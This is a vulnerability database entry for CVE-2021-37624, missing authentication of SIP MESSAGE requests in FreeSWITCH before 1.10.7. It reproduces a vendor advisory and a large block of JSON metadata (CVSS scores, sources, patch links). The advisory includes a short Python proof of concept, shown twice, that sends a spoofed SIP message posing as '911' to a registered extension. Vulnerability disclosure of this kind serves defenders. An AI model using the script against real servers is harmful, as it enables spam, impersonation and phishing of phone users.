var-202110-1048
Vulnerability from variot
FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, FreeSWITCH does not authenticate SIP MESSAGE requests, leading to spam and message spoofing. By default, SIP requests of the type MESSAGE (RFC 3428) are not authenticated in the affected versions of FreeSWITCH. MESSAGE requests are relayed to SIP user agents registered with the FreeSWITCH server without requiring any authentication. Although this behaviour can be changed by setting the auth-messages parameter to true, it is not the default setting. Abuse of this security issue allows attackers to send SIP MESSAGE messages to any SIP user agent that is registered with the server without requiring authentication. Additionally, since no authentication is required, chat messages can be spoofed to appear to come from trusted entities. Therefore, abuse can lead to spam and enable social engineering, phishing and similar attacks. This issue is patched in version 1.10.7. Maintainers recommend that this SIP message type is authenticated by default so that FreeSWITCH administrators do not need to be explicitly set the auth-messages parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication. FreeSWITCH There is an authentication vulnerability in.Information may be tampered with. FreeSWITCH is a set of free and open source communication software developed by the individual developer Anthony Minesale in the United States. The software can be used to create audio, video and short message products and applications.
We are issuing this advisory because, in the course of our work, we have noticed that most FreeSWITCH installations that are exposed to the Internet do not authenticate MESSAGE requests.
How to reproduce the issue
- Install FreeSWITCH v1.10.6 or lower
- Run FreeSWITCH using the default configuration
- Register as a legitimate SIP user with the FreeSWITCH server (e.g.
sip:1000@192.168.1.100where192.168.1.100is your FreeSWITCH server) using a softphone that can process MESSAGE (such as Zoiper) - Save the below Python script to
anon-message.py - Run the Python script
python anon-message.py <freeswitch_ip> <target_extension> - Observe the SIP message appear on your softphone, pretending to be from 911
```python import sys, socket, random, string
UDP_IP = sys.argv[1] UDP_PORT = 5060 ext = sys.argv[2] rand = ''.join(random.choice(string.ascii_lowercase) for i in range(8)) msg="MESSAGE sip:%s@%s SIP/2.0\r\n" % (ext, UDP_IP) msg+="Via: SIP/2.0/UDP 192.168.1.159:46896;rport;branch=z9hG4bK-%s\r\n" % rand msg+="Max-Forwards: 70\r\n" msg+="From: 911 sip:911@%s;tag=%s\r\n" %(UDP_IP, rand) msg+="To: sip:%s@%s\r\n" %(ext, UDP_IP) msg+="Call-ID: %s\r\n" % rand msg+="CSeq: 1 MESSAGE\r\n" msg+="Contact: sip:911@192.168.1.159:48760;transport=udp\r\n" msg+="Content-Type: text/plain\r\n" msg+="Content-Length: 5\r\n\r\n" msg+="hello"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(msg.encode(), (UDP_IP, UDP_PORT)) ```
Solution and recommendations
Upgrade to a version of FreeSWITCH that fixes this issue.
About Enable Security
Enable Security develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack.
Disclaimer
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Disclosure policy
This report is subject to Enable Security's vulnerability disclosure policy which can be found at https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202110-1048",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "freeswitch",
"scope": "lt",
"trust": 1.0,
"vendor": "freeswitch",
"version": "1.10.7"
},
{
"model": "freeswitch",
"scope": "eq",
"trust": 0.8,
"vendor": "freeswitch",
"version": null
},
{
"model": "freeswitch",
"scope": "eq",
"trust": 0.8,
"vendor": "freeswitch",
"version": "1.10.7"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-013913"
},
{
"db": "NVD",
"id": "CVE-2021-37624"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sandro Gauci",
"sources": [
{
"db": "PACKETSTORM",
"id": "164628"
}
],
"trust": 0.1
},
"cve": "CVE-2021-37624",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2021-37624",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-397859",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2021-37624",
"impactScore": 3.6,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "OTHER",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2021-013913",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-37624",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2021-37624",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2021-37624",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202110-1790",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-397859",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2021-37624",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-397859"
},
{
"db": "VULMON",
"id": "CVE-2021-37624"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013913"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1790"
},
{
"db": "NVD",
"id": "CVE-2021-37624"
},
{
"db": "NVD",
"id": "CVE-2021-37624"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, FreeSWITCH does not authenticate SIP MESSAGE requests, leading to spam and message spoofing. By default, SIP requests of the type MESSAGE (RFC 3428) are not authenticated in the affected versions of FreeSWITCH. MESSAGE requests are relayed to SIP user agents registered with the FreeSWITCH server without requiring any authentication. Although this behaviour can be changed by setting the `auth-messages` parameter to `true`, it is not the default setting. Abuse of this security issue allows attackers to send SIP MESSAGE messages to any SIP user agent that is registered with the server without requiring authentication. Additionally, since no authentication is required, chat messages can be spoofed to appear to come from trusted entities. Therefore, abuse can lead to spam and enable social engineering, phishing and similar attacks. This issue is patched in version 1.10.7. Maintainers recommend that this SIP message type is authenticated by default so that FreeSWITCH administrators do not need to be explicitly set the `auth-messages` parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication. FreeSWITCH There is an authentication vulnerability in.Information may be tampered with. FreeSWITCH is a set of free and open source communication software developed by the individual developer Anthony Minesale in the United States. The software can be used to create audio, video and short message products and applications. \n\nWe are issuing this advisory because, in the course of our work, we have noticed that most FreeSWITCH installations that are exposed to the Internet do not authenticate MESSAGE requests. \n\n## How to reproduce the issue\n\n1. Install FreeSWITCH v1.10.6 or lower\n2. Run FreeSWITCH using the default configuration\n3. Register as a legitimate SIP user with the FreeSWITCH server (e.g. `sip:1000@192.168.1.100` where `192.168.1.100` is your FreeSWITCH server) using a softphone that can process MESSAGE (such as Zoiper)\n4. Save the below Python script to `anon-message.py`\n5. Run the Python script `python anon-message.py \u003cfreeswitch_ip\u003e \u003ctarget_extension\u003e`\n6. Observe the SIP message appear on your softphone, pretending to be from 911\n\n\n```python\nimport sys, socket, random, string\n\nUDP_IP = sys.argv[1]\nUDP_PORT = 5060\next = sys.argv[2]\nrand = \u0027\u0027.join(random.choice(string.ascii_lowercase) for i in range(8))\nmsg=\"MESSAGE sip:%s@%s SIP/2.0\\r\\n\" % (ext, UDP_IP)\nmsg+=\"Via: SIP/2.0/UDP 192.168.1.159:46896;rport;branch=z9hG4bK-%s\\r\\n\" % rand\nmsg+=\"Max-Forwards: 70\\r\\n\"\nmsg+=\"From: 911 \u003csip:911@%s\u003e;tag=%s\\r\\n\" %(UDP_IP, rand)\nmsg+=\"To: \u003csip:%s@%s\u003e\\r\\n\" %(ext, UDP_IP)\nmsg+=\"Call-ID: %s\\r\\n\" % rand\nmsg+=\"CSeq: 1 MESSAGE\\r\\n\"\nmsg+=\"Contact: \u003csip:911@192.168.1.159:48760;transport=udp\u003e\\r\\n\"\nmsg+=\"Content-Type: text/plain\\r\\n\"\nmsg+=\"Content-Length: 5\\r\\n\\r\\n\"\nmsg+=\"hello\"\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.sendto(msg.encode(), (UDP_IP, UDP_PORT))\n```\n\n## Solution and recommendations\n\nUpgrade to a version of FreeSWITCH that fixes this issue. \n\n## About Enable Security\n\n[Enable Security](https://www.enablesecurity.com) develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack. \n\n## Disclaimer\n\nThe information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. \n\n## Disclosure policy\n\nThis report is subject to Enable Security\u0027s vulnerability disclosure policy which can be found at \u003chttps://github.com/EnableSecurity/Vulnerability-Disclosure-Policy\u003e",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-37624"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013913"
},
{
"db": "VULHUB",
"id": "VHN-397859"
},
{
"db": "VULMON",
"id": "CVE-2021-37624"
},
{
"db": "PACKETSTORM",
"id": "164628"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-37624",
"trust": 3.5
},
{
"db": "PACKETSTORM",
"id": "164628",
"trust": 1.9
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/10/25/6",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013913",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1790",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-397859",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-37624",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-397859"
},
{
"db": "VULMON",
"id": "CVE-2021-37624"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013913"
},
{
"db": "PACKETSTORM",
"id": "164628"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1790"
},
{
"db": "NVD",
"id": "CVE-2021-37624"
}
]
},
"id": "VAR-202110-1048",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-397859"
}
],
"trust": 0.01
},
"last_update_date": "2024-08-14T13:43:17.548000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "FreeSWITCH\u00a0v1.10.7\u00a0Release GitHub",
"trust": 0.8,
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"title": "FreeSWITCH Remediation measures for authorization problem vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=167182"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/Live-Hack-CVE/CVE-2021-37624 "
},
{
"title": "PewSWITCH",
"trust": 0.1,
"url": "https://github.com/0xInfection/PewSWITCH "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/soosmile/POC "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-37624"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013913"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1790"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.1
},
{
"problemtype": "CWE-306",
"trust": 1.1
},
{
"problemtype": "Inappropriate authentication (CWE-287) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-397859"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013913"
},
{
"db": "NVD",
"id": "CVE-2021-37624"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/164628/freeswitch-1.10.6-missing-sip-message-authentication.html"
},
{
"trust": 1.9,
"url": "https://github.com/signalwire/freeswitch/security/advisories/ghsa-mjcm-q9h8-9xv3"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2021/oct/44"
},
{
"trust": 1.8,
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"trust": 1.8,
"url": "http://www.openwall.com/lists/oss-security/2021/10/25/6"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-37624"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/306.html"
},
{
"trust": 0.1,
"url": "https://github.com/live-hack-cve/cve-2021-37624"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/0xinfection/pewswitch"
},
{
"trust": 0.1,
"url": "https://github.com/enablesecurity/vulnerability-disclosure-policy\u003e."
},
{
"trust": 0.1,
"url": "https://www.enablesecurity.com)"
},
{
"trust": 0.1,
"url": "https://github.com/enablesecurity/advisories/tree/master/es2021-07-freeswitch-sip-message-without-auth"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-397859"
},
{
"db": "VULMON",
"id": "CVE-2021-37624"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013913"
},
{
"db": "PACKETSTORM",
"id": "164628"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1790"
},
{
"db": "NVD",
"id": "CVE-2021-37624"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-397859"
},
{
"db": "VULMON",
"id": "CVE-2021-37624"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013913"
},
{
"db": "PACKETSTORM",
"id": "164628"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1790"
},
{
"db": "NVD",
"id": "CVE-2021-37624"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-10-25T00:00:00",
"db": "VULHUB",
"id": "VHN-397859"
},
{
"date": "2021-10-25T00:00:00",
"db": "VULMON",
"id": "CVE-2021-37624"
},
{
"date": "2022-09-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-013913"
},
{
"date": "2021-10-25T17:12:16",
"db": "PACKETSTORM",
"id": "164628"
},
{
"date": "2021-10-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202110-1790"
},
{
"date": "2021-10-25T16:15:08.263000",
"db": "NVD",
"id": "CVE-2021-37624"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-10-27T00:00:00",
"db": "VULHUB",
"id": "VHN-397859"
},
{
"date": "2022-10-27T00:00:00",
"db": "VULMON",
"id": "CVE-2021-37624"
},
{
"date": "2022-09-29T07:20:00",
"db": "JVNDB",
"id": "JVNDB-2021-013913"
},
{
"date": "2022-10-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202110-1790"
},
{
"date": "2022-10-27T16:36:33.607000",
"db": "NVD",
"id": "CVE-2021-37624"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202110-1790"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "FreeSWITCH\u00a0 Authentication vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-013913"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "access control error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202110-1790"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.